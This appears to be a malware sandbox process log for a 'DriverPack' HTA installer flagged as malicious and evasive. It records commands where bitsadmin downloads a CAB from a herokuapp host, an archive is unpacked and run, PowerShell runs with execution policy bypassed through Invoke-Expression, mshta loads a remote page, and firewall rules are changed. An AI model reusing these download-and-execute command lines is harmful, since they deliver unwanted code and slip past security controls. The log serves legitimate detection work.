Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /R /V "^$"
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c powershell Get-MpComputerStatus > "C:\Users\user\AppData\Local\Temp\dwnl_48795\log_defenderVersionPowershell.txt
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Get-MpComputerStatus
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-48795 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\user\AppData\Local\Temp\dwnl_48795\log_bits_info.txt
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\bitsadmin.exe bitsadmin /info dwnl-task-48795
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /R /V "^$"
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-48795 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\user\AppData\Local\Temp\dwnl_48795\log_bits_info.txt
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\bitsadmin.exe bitsadmin /info dwnl-task-48795
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /R /V "^$"
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c expand "C:\Users\user\AppData\Local\Temp\dwnl_48795\dwnl_beetle-cab.cab" -F:* C:\Users\user\AppData\Local\Temp > "C:\Users\user\AppData\Local\Temp\dwnl_48795\log_expand.txt
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\expand.exe expand "C:\Users\user\AppData\Local\Temp\dwnl_48795\dwnl_beetle-cab.cab" -F:* C:\Users\user\AppData\Local\Temp
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c bitsadmin /transfer dwnl-task-48795 /download /priority foreground http://dwrapper-dev.herokuapp.com/beetle-cab.cab "C:\Users\user\AppData\Local\Temp\dwnl_48795\dwnl_beetle-cab.cab" | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\user\AppData\Local\Temp\dwnl_48795\log_bits_start.txt
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c powershell Get-MpComputerStatus > "C:\Users\user\AppData\Local\Temp\dwnl_48795\log_defenderVersionPowershell.txt
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe x -y -aoa -pbeetle "C:\Users\user\AppData\Local\Temp\beetle-cab\arc.7z" -o"C:\Users\user\AppData\Local\Temp\beetle-cab\DriverPack" > "C:\Users\user\AppData\Local\Temp\dwnl_48795\log_7zip.txt
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe x -y -aoa -pbeetle "C:\Users\user\AppData\Local\Temp\beetle-cab\arc.7z" -o"C:\Users\user\AppData\Local\Temp\beetle-cab\DriverPack"
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-48795 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\user\AppData\Local\Temp\dwnl_48795\log_bits_info.txt
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-48795 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\user\AppData\Local\Temp\dwnl_48795\log_bits_info.txt
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c expand "C:\Users\user\AppData\Local\Temp\dwnl_48795\dwnl_beetle-cab.cab" -F:* C:\Users\user\AppData\Local\Temp > "C:\Users\user\AppData\Local\Temp\dwnl_48795\log_expand.txt
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe x -y -aoa -pbeetle "C:\Users\user\AppData\Local\Temp\beetle-cab\arc.7z" -o"C:\Users\user\AppData\Local\Temp\beetle-cab\DriverPack" > "C:\Users\user\AppData\Local\Temp\dwnl_48795\log_7zip.txt
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\bitsadmin.exe bitsadmin /transfer dwnl-task-48795 /download /priority foreground http://dwrapper-dev.herokuapp.com/beetle-cab.cab "C:\Users\user\AppData\Local\Temp\dwnl_48795\dwnl_beetle-cab.cab"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /R /V "^$"
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\beetle-cab\DriverPack\start.bat" && echo %errorlevel% > "C:\Users\user\AppData\Local\Temp\dwnl_48795\log_runAsAdmin.txt
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Local\Temp\beetle-cab\DriverPack\start.bat"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Get-MpComputerStatus
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\AppData\Local\Temp\beetle-cab\DriverPack\run.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} --sfx
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\bitsadmin.exe bitsadmin /info dwnl-task-48795
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /R /V "^$"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\bitsadmin.exe bitsadmin /info dwnl-task-48795
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /R /V "^$"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\expand.exe expand "C:\Users\user\AppData\Local\Temp\dwnl_48795\dwnl_beetle-cab.cab" -F:* C:\Users\user\AppData\Local\Temp
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /C powershell -NonInteractive -NoLogo -NoProfile -ExecutionPolicy Bypass "Get-Content 'C:\Users\user\AppData\Roaming\DRPSu\temp\ps.lluon6kn.jqa89.cmd.txt' -Wait | Invoke-Expression" > "C:\Users\user\AppData\Roaming\DRPSu\temp\ps.lluon6kn.jqa89.stdout.log" 2> "C:\Users\user\AppData\Roaming\DRPSu\temp\ps.lluon6kn.jqa89.stderr.log
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -NonInteractive -NoLogo -NoProfile -ExecutionPolicy Bypass "Get-Content 'C:\Users\user\AppData\Roaming\DRPSu\temp\ps.lluon6kn.jqa89.cmd.txt' -Wait | Invoke-Expression"
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\mshta.exe C:\Windows\system32\mshta.exe" "http://dwrapper-prod.herokuapp.com/bin/watcher.html
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 kernel32,Sleep
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c "netsh advfirewall firewall delete rule name="DriverPack aria2c.exe" || echo Done & call echo Done %^errorLevel% > "C:\Users\user\AppData\Roaming\DRPSu\temp\run_command_8360.txt"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall delete rule name="DriverPack aria2c.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\e2ligmzk\e2ligmzk.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC4A9.tmp" "c:\Users\user\AppData\Local\Temp\e2ligmzk\CSCD3ADA2B05B0248E496F87BE664C3E88D.TMP"
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c "netsh advfirewall firewall add rule name="DriverPack aria2c.exe" dir=in action=allow program="C:\Users\user\AppData\Local\Temp\beetle-cab\DriverPack\tools\aria2c.exe" || echo Done & call echo Done %^errorLevel% > "C:\Users\user\AppData\Roaming\DRPSu\temp\run_command_84501.txt"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="DriverPack aria2c.exe" dir=in action=allow program="C:\Users\user\AppData\Local\Temp\beetle-cab\DriverPack\tools\aria2c.exe"
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\user\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/intro.mp3" -o "C:\Users\user\AppData\Roaming\DRPSu\temp\wget_log_68896.log" & echo DONE > "C:\Users\user\AppData\Roaming\DRPSu\temp\wget_finished_68896.txt"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\user\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/START-INITIAL-1.mp3" -o "C:\Users\user\AppData\Roaming\DRPSu\temp\wget_log_40078.log" & echo DONE > "C:\Users\user\AppData\Roaming\DRPSu\temp\wget_finished_40078.txt"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\user\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/START-LOADED-1.mp3" -o "C:\Users\user\AppData\Roaming\DRPSu\temp\wget_log_58899.log" & echo DONE > "C:\Users\user\AppData\Roaming\DRPSu\temp\wget_finished_58899.txt"
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\user\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/START-SETUP-1.mp3" -o "C:\Users\user\AppData\Roaming\DRPSu\temp\wget_log_70521.log" & echo DONE > "C:\Users\user\AppData\Roaming\DRPSu\temp\wget_finished_70521.txt"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\beetle-cab\DriverPack\Tools\driverpack-wget.exe "tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\user\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/intro.mp3" -o "C:\Users\user\AppData\Roaming\DRPSu\temp\wget_log_68896.log"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\beetle-cab\DriverPack\Tools\driverpack-wget.exe "tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\user\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/START-INITIAL-1.mp3" -o "C:\Users\user\AppData\Roaming\DRPSu\temp\wget_log_40078.log"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\beetle-cab\DriverPack\Tools\driverpack-wget.exe "tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\user\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/START-LOADED-1.mp3" -o "C:\Users\user\AppData\Roaming\DRPSu\temp\wget_log_58899.log"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\beetle-cab\DriverPack\Tools\driverpack-wget.exe "tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\user\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/START-SETUP-1.mp3" -o "C:\Users\user\AppData\Roaming\DRPSu\temp\wget_log_70521.log"
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\beetle-cab\DriverPack\start.bat" && echo %errorlevel% > "C:\Users\user\AppData\Local\Temp\dwnl_48795\log_runAsAdmin.txt
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\mshta.exe C:\Windows\system32\mshta.exe" "http://dwrapper-prod.herokuapp.com/bin/watcher.html
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe x -y -aoa -pbeetle "C:\Users\user\AppData\Local\Temp\beetle-cab\arc.7z" -o"C:\Users\user\AppData\Local\Temp\beetle-cab\DriverPack"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Local\Temp\beetle-cab\DriverPack\start.bat"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\AppData\Local\Temp\beetle-cab\DriverPack\run.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} --sfx
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /C powershell -NonInteractive -NoLogo -NoProfile -ExecutionPolicy Bypass "Get-Content 'C:\Users\user\AppData\Roaming\DRPSu\temp\ps.lluon6kn.jqa89.cmd.txt' -Wait | Invoke-Expression" > "C:\Users\user\AppData\Roaming\DRPSu\temp\ps.lluon6kn.jqa89.stdout.log" 2> "C:\Users\user\AppData\Roaming\DRPSu\temp\ps.lluon6kn.jqa89.stderr.log
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 kernel32,Sleep
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c "netsh advfirewall firewall delete rule name="DriverPack aria2c.exe" || echo Done & call echo Done %^errorLevel% > "C:\Users\user\AppData\Roaming\DRPSu\temp\run_command_8360.txt"
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c "netsh advfirewall firewall add rule name="DriverPack aria2c.exe" dir=in action=allow program="C:\Users\user\AppData\Local\Temp\beetle-cab\DriverPack\tools\aria2c.exe" || echo Done & call echo Done %^errorLevel% > "C:\Users\user\AppData\Roaming\DRPSu\temp\run_command_84501.txt"
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\user\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/intro.mp3" -o "C:\Users\user\AppData\Roaming\DRPSu\temp\wget_log_68896.log" & echo DONE > "C:\Users\user\AppData\Roaming\DRPSu\temp\wget_finished_68896.txt"
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\user\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/START-INITIAL-1.mp3" -o "C:\Users\user\AppData\Roaming\DRPSu\temp\wget_log_40078.log" & echo DONE > "C:\Users\user\AppData\Roaming\DRPSu\temp\wget_finished_40078.txt"
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\user\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/START-LOADED-1.mp3" -o "C:\Users\user\AppData\Roaming\DRPSu\temp\wget_log_58899.log" & echo DONE > "C:\Users\user\AppData\Roaming\DRPSu\temp\wget_finished_58899.txt"
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\user\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/START-SETUP-1.mp3" -o "C:\Users\user\AppData\Roaming\DRPSu\temp\wget_log_70521.log" & echo DONE > "C:\Users\user\AppData\Roaming\DRPSu\temp\wget_finished_70521.txt"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\Downloads\PROD_Start_DriverPack.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -NonInteractive -NoLogo -NoProfile -ExecutionPolicy Bypass "Get-Content 'C:\Users\user\AppData\Roaming\DRPSu\temp\ps.lluon6kn.jqa89.cmd.txt' -Wait | Invoke-Expression"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\e2ligmzk\e2ligmzk.cmdline
Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Handle = "8164"
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name = "wscript.exe" AND CommandLine LIKE "%\"C:\\Users\\user\\AppData\\Local\\Temp\\beetle-cab\\DriverPack\\prepare.js\" hardware"
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Handle = "8164"
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name = "wscript.exe" AND CommandLine LIKE "%\"C:\\Users\\user\\AppData\\Local\\Temp\\beetle-cab\\DriverPack\\prepare.js\" hardware"
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Handle = "8164"
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name = "wscript.exe" AND CommandLine LIKE "%\"C:\\Users\\user\\AppData\\Local\\Temp\\beetle-cab\\DriverPack\\prepare.js\" hardware"
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name = "wscript.exe" AND CommandLine LIKE "%\"C:\\Users\\user\\AppData\\Local\\Temp\\beetle-cab\\DriverPack\\prepare.js\" drivers"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\Downloads\f7540a29-c426-4f6e-acd1-e4a2834a7ba4.tmp
Source: C:\Windows\SysWOW64\mshta.exeFile created: C:\Users\user\AppData\Local\Temp\dwnl_48795
Source: classification engineClassification label: mal96.phis.expl.evad.win@116/860@0/236
Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\desktop.ini
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\bf92dcc11e428fd5adf02632b5d4414f\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\bf92dcc11e428fd5adf02632b5d4414f\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 kernel32,Sleep
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7556:120:WilError_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3672:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5684:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5684:120:WilError_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5984:120:WilError_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5400:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5984:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7784:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7352:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7784:120:WilError_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5400:120:WilError_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7556:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7352:120:WilError_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3672:120:WilError_02
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Program Files\Google\GoogleUpdater
